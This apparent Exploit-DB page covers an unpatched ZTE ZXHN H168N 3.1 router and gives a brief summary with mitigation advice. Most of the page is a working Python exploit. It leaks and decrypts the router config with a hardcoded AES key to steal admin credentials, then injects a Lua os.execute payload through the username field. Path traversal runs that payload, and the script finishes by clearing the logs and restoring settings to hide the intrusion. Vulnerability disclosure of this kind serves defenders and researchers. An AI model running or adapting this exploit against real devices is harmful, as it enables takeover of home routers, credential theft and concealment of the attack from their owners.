header-logo
Suggest Exploit
vendor:
ZXHN H168N
by:
l34n / tasos meletlidis
6.1
CVSS
HIGH
Remote Code Execution
CWE
Product Name: ZXHN H168N
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE:
CPE: h:zte:zxhn_h168n:3.1
Metasploit:
Other Scripts:
Platforms Tested:
2021

ZTE ZXHN H168N 3.1 – Remote Code Execution via Authentication Bypass

The ZTE ZXHN H168N 3.1 router is vulnerable to remote code execution due to an authentication bypass. By exploiting this vulnerability, an attacker can execute arbitrary code on the target device. This vulnerability has not been assigned a CVE ID yet.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the ZTE ZXHN H168N 3.1 router to the latest version. Additionally, restrict network access to the device and change default login credentials.
Source

Exploit-DB raw data:

# Exploit Title:  ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/

import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES

def login(host, port, username, password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "Username": username,
        "Password": password,
        "Frm_Logintoken": "",
        "action": "login"
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)

def logout(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_LogOff": "1",
        "IF_LanguageSwitch": "",
        "IF_ModeSwitch": ""
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)    

def leak_config(host, port):
    conn = http.client.HTTPConnection(host, port)
    boundary = "---------------------------25853724551472601545982946443"
    body = (
        f"{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"{boundary}--\r\n"
    )

    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }

    conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)

    response = conn.getresponse()
    response_data = response.read()

    with open("config.bin", "wb") as file:
        file.write(response_data)

    conn.close()

def _read_exactly(fd, size, desc="data"):
    chunk = fd.read(size)
    if len(chunk) != size:
        return None
    return chunk

def _read_struct(fd, fmt, desc="struct"):
    size = struct.calcsize(fmt)
    data = _read_exactly(fd, size, desc)
    if data is None:
        return None
    return struct.unpack(fmt, data)

def read_aes_data(fd_in, key):
    encrypted_data = b""
    while True:
        aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if aes_hdr is None:
            return None
        _, chunk_len, marker = aes_hdr

        chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
        if chunk is None:
            return None

        encrypted_data += chunk
        if marker == 0:
            break

    cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
    fd_out = BytesIO()
    fd_out.write(cipher.decrypt(encrypted_data))
    fd_out.seek(0)
    return fd_out

def read_compressed_data(fd_in, enc_header):
    hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if enc_header[6] != hdr_crc:
        return None

    total_crc = 0
    fd_out = BytesIO()

    while True:
        comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if comp_hdr is None:
            return None
        uncompr_len, compr_len, marker = comp_hdr

        chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
        if chunk is None:
            return None

        total_crc = zlib.crc32(chunk, total_crc)
        uncompressed = zlib.decompress(chunk)
        if len(uncompressed) != uncompr_len:
            return None

        fd_out.write(uncompressed)
        if marker == 0:
            break

    if enc_header[5] != total_crc:
        return None

    fd_out.seek(0)
    return fd_out

def read_config(fd_in, fd_out, key):
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return

    ver_header_2_offset = 0x14 + ver_header_1[4]

    fd_in.seek(ver_header_2_offset)
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return
    ver_header_3_offset = ver_header_2[10]

    fd_in.seek(ver_header_3_offset)
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return
    signed_cfg_size = ver_header_3[3]

    file_size = stat(fd_in.name).st_size

    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return

    sign_length = sign_header[2]

    signature = _read_exactly(fd_in, sign_length, desc="signature")
    if signature is None:
        return

    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return

    enc_type = encryption_header[1]

    if enc_type in (1, 2):
        if not key:
            return
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return

    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        enc_type = 0

    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return

    fd_out.write(fd_in.read())
    
def decrypt_config(config_key):
    encrypted = open("config.bin", "rb")
    decrypted = open("decrypted.xml", "wb")
    
    read_config(encrypted, decrypted, config_key)
    
    with open("decrypted.xml", "r") as file:
        contents = file.read()
        username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
        password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
        
    encrypted.close()
    os.system("rm config.bin")
    decrypted.close()
    os.system("rm decrypted.xml")

    return username, password

def change_log_level(host, port, log_level):
    level_map = {
        "critical": "2",
        "notice": "5"
    }

    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": level_map[log_level],
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": ""
    }
    
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def change_username(host, port, new_username, old_password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": ""
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)

def clear_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "clearlog"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def refresh_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Refresh"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def trigger_rce(host, port):
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")

def rce(cmd):
    return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"

def pwn(config_key, host, port):
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    
    login(host, port, username, password)

    shellcode = "echo \"pwned\""
    payload = rce(shellcode)

    change_username(host, port, payload, password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)

    trigger_rce(host, port)
    clear_log(host, port)

    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")

def main():
    parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd")
    parser.add_argument("--host", required=True, help="Target IP address of the router")
    parser.add_argument("--port", required=True, type=int, help="Target port of the router")

    args = parser.parse_args()
    
    pwn(args.config_key, args.host, args.port)

if __name__ == "__main__":
    main()